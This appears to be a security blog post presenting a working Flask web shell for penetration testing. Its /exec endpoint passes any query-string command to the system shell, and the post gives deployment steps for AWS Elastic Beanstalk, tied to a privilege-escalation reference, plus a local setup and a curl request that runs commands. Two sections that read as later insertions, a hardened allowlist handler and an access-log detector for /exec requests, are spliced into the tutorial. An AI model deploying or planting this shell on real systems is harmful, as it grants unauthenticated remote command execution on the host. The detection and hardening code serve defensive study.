
This post contains a simple web shell written in Flask. It can be used during penetration testing of Flask applications to execute system commands on the host that runs the app.

Execute Web Shell

Create a file named requirements.txt with the following content.

Flask

Create a file named application.py with the following code in it.

from flask import Flask, request, jsonify
import subprocess

app = Flask(__name__)

@app.route('/exec', methods=['GET'])
def exec_command():
    # Get the shell command from the query parameters
    command = request.args.get('command')

    if not command:
        return jsonify({"error": "No command provided"}), 400

    # Ideally, validate and sanitize the command here!

    try:
        # The command string is handed to the system shell unchanged (shell=True),
        # so whatever the client sends is interpreted by /bin/sh on the host.
        result = subprocess.run(command, shell=True, capture_output=True, text=True)
        return jsonify({
            "stdout": result.stdout,
            "stderr": result.stderr,
            "returncode": result.returncode
        })
    except Exception as e:
        return jsonify({"error": str(e)}), 500

if __name__ == '__main__':
    # Use the following if you're uploading to Elastic Beanstalk or a similar container
    app.run(debug=True)
    # Use the following for local testing
    # app.run(host='0.0.0.0', port=5000)
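The handler above passes the raw query string to a shell, which is exactly what the "validate and sanitize" comment warns about. The following is an added example of the hardened counterpart (it is not the blog's code and not part of the web shell): the client may only name an entry from a fixed allowlist, the server owns the argv, and nothing is run through a shell. The command names and argv lists in ALLOWED_COMMANDS are constructed for this example; a Flask route would simply return jsonify(run_named_command(request.args.get("command", ""))).

```python
import shlex
import subprocess

# Fixed allowlist: the client picks a name, the server supplies the argv.
# These names and argv lists are constructed for this example.
ALLOWED_COMMANDS = {
    "list": ["ls", "-l", "."],
    "whoami": ["whoami"],
    "uptime": ["uptime"],
}


def resolve_command(name):
    """Map a client-supplied name to a fixed argv list, or None if not allowed.

    Anything that is not exactly one allowlisted token is rejected, so extra
    arguments, chained commands or command substitution never reach a shell.
    """
    if not isinstance(name, str):
        return None
    try:
        tokens = shlex.split(name)
    except ValueError:  # unbalanced quotes etc.
        return None
    if len(tokens) != 1:
        return None
    return ALLOWED_COMMANDS.get(tokens[0])


def run_named_command(name):
    """Execute an allowlisted command without a shell and return a result dict."""
    argv = resolve_command(name)
    if argv is None:
        return {"error": "command not allowed", "returncode": None}
    # shell=False: argv is passed straight to execve, no /bin/sh involved.
    result = subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=10)
    return {
        "stdout": result.stdout,
        "stderr": result.stderr,
        "returncode": result.returncode,
    }


if __name__ == "__main__":
    for candidate in ("list", "ls -l", "list; whoami", "$(whoami)"):
        print(repr(candidate), "->", run_named_command(candidate))
```

The point of the design is that the HTTP parameter is used only as a lookup key; even if an attacker controls it completely, the process that gets executed is one the server author chose in advance.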

Execute From Elastic Beanstalk

Upload and publish the web shell Flask app as your requirements dictate. Help can be found at the following links.

More Info:

https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkrebuildenvironment-s3-write-permissions–many-others

https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/python-quickstart.html

Execute command by Sending the Following GET Request

curl "http://<your-elastic-beanstalk-URL>/exec?command=ls%20-l"
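Requests like the one above are easy to spot in web server access logs: a fixed path with a command parameter whose value URL-decodes to a shell command. The following is an added detection example (not part of the blog post) that parses combined-format access log lines, URL-decodes the query string and reports every request to the /exec endpoint that carries a command parameter. The log lines are constructed sample data, not real traffic.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [10/May/2024:12:00:01 +0000] "GET /exec?command=ls%20-l HTTP/1.1" 200 312 "-" "curl/8.4.0"
198.51.100.7 - - [10/May/2024:12:00:05 +0000] "GET /static/app.css HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.10 - - [10/May/2024:12:00:09 +0000] "GET /exec?command=uname%20-a HTTP/1.1" 200 88 "-" "curl/8.4.0"
203.0.113.10 - - [10/May/2024:12:00:12 +0000] "GET /exec HTTP/1.1" 400 40 "-" "curl/8.4.0"
"""

# Minimal combined-log-format parser: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def find_webshell_requests(log_text, path="/exec", param="command"):
    """Return one dict per request that hits `path` with a non-empty `param`.

    The query string is URL-decoded via parse_qs, so the reported command is
    what the server actually received (e.g. "ls%20-l" becomes "ls -l").
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line
        parts = urlsplit(m.group("target"))
        if parts.path != path:
            continue
        values = parse_qs(parts.query).get(param)
        if not values:
            continue  # /exec without a command, e.g. the 400 case
        hits.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "status": int(m.group("status")),
            "command": values[0],
        })
    return hits


def sources(hits):
    """Count flagged requests per client IP, useful for a quick triage summary."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = find_webshell_requests(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["ip"]} status={h["status"]} command={h["command"]!r}')
    print("per-source counts:", sources(found))
```

Matching on the decoded parameter rather than the raw URL matters because the same command can be encoded in several ways; in a real deployment the path and parameter name would be whatever the suspect application exposes, which is why both are arguments.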

Execute From Local Setup for Testing

Change the last lines as shown below to run on a local server on port 5000.

    # Use the following if you're uploading to Elastic Beanstalk or a similar container
    # app.run(debug=True)
    # Use the following for local testing
    app.run(host='0.0.0.0', port=5000)

Then run the following command from the folder containing application.py and requirements.txt to start the Flask server with the web shell.

# export FLASK_APP=application.py && flask run --port 5000
 * Serving Flask app 'application.py'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:5000
Press CTRL+C to quit


Tags

AWS, Cloud Security, Flask, Web Application Security, Web Shell
